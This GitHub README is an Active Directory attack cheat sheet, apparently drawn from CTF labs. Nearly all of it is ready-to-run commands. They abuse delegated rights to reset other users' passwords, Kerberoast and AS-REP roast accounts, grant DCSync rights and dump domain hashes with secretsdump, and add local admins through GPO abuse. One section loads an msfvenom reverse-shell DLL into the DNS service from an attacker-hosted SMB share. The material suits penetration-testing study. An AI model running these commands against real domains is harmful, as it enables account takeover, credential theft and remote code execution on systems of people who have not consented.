Skip to content

k4sth4/Abusing-rights-in-a-Domain

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
README.md
README.md
 
 
_config.yml
_config.yml
 
 

Repository files navigation

Abusing-rights-in-a-Domain

Different domain users, have different rights. Some domain users have GenericAll, GenericWrite, WriteDacl, WriteOwner privilege on other domain users or groups. We can abuse these privileges and move further in domain.

1. Abusing GenericAll Privilege

eg: (john have GenericAll priv on Exchange Windows Permissions group)

We can add user in Exchange Windows Permissions group and then we have full control.

net group "Exchange Windows Permissions" john /add /domain

GenericAll Privilege on adams user. 3-Ways.

  1. We can change the adam password.
net user adams N3wPassw0rd! /domain
  1. We can set adams user SPN and do Kerberoasting.

Import Powerview.ps1

Set-DomainObject -Identity adams -Set @{serviceprincipalname="fake/NOTHING"} .\Rubeus.exe kerberoast /user:jadams /nowrap
  1. We can set adams account to AS-REP Roasting.
Set-DomainObject -Identity adams -XOR @{UserAccountControl=4194304} .\Rubeus.exe asreproast /user:jadams /nowrap

2. Abusing GenericWrite Perm on a User

Here lily is the user on which we have generic write perm we can set this user to PreAuth and then by using AS-REP Roasting we can get the user hash and crack it and login into system.

Set-ADAccountControl -Identity lily -DoesNotRequirePreAuth $true

Now we can do AS-REP Roasting.

3. Abusing WriteDacl Priv on any Group

eg: claire has WriteDacl rights on the Backup_Admins group. We can add it to Backup_Admins group.

net group backup_admins net group backup_admins claire /add

NOTE: Open another shell if changes are not reflected.

4. Abusing WriteDacl Priv On Domain by grant yourself the DcSync privileges

dan (user) has WriteDacl Perm on DC.

using Impacket tool:

ntlmrelayx.py -t ldap://10.129.95.210 --escalate-user dan

(10.129.95.210 = target IP)

nevigate to http://127.0.0.1 and enter the user (dan & pass) now wait till it ask for you to run secretsdump.py using creds

5. Abusing WriteOwner Privilege

We're tom user and getting ownership of claire and then change passwd of claire. Import Powerview.ps1.

Set-DomainObjectOwner -identity claire -OwnerIdentity tom Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword $cred = ConvertTo-SecureString "qwer1234QWER!@#$" -AsPlainText -force Set-DomainUserPassword -identity claire -accountpassword $cred

6. Abusing DNS Admin wrights

This way is just for CTFs, in real world this will gonna break the DNS service.

Step1. create a revshell via msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=4444 -f dll > shell.dll

Step2. set smbserver in the same dir where shell.dll

impacket-smbserver -smb2support share .

Step3. exploitation on target machine (we don't need to upload shell.dll)

dnscmd.exe /config /serverlevelplugindll \\10.10.x.x\share\shell.dll sc.exe stop dns sc.exe start dns

You will get a reverse shell.

7. Abusing ForceChange Password from linux os

login as support user and audit2020 is the user whose passwd gonna change.

rpcclient -U support 10.129.1.243 setuserinfo2 audit2020 23 'Passw0rd!'

8. DcSync Attack

mrlky has Get-Changes privilege on the domain.

secretsdump.py -just-dc mrlky:Football@10.10.10.103

9. Abuse GPO Policy

upload SharpGPOAbuse.exe

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount hackzzdogs --GPOName "DCPolicy" gpupdate /force

(hackzzdogs = current user name)

(DCPolicy = Group Policy Name you can find it on bloodhound)

Now we're in local administrator group.

net loacalgroup administrators

About

Active Directory Privileges

Topics

rights active-directory domain privilege active-directory-exploitation abusing

Resources

Readme
Activity

Stars

6 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published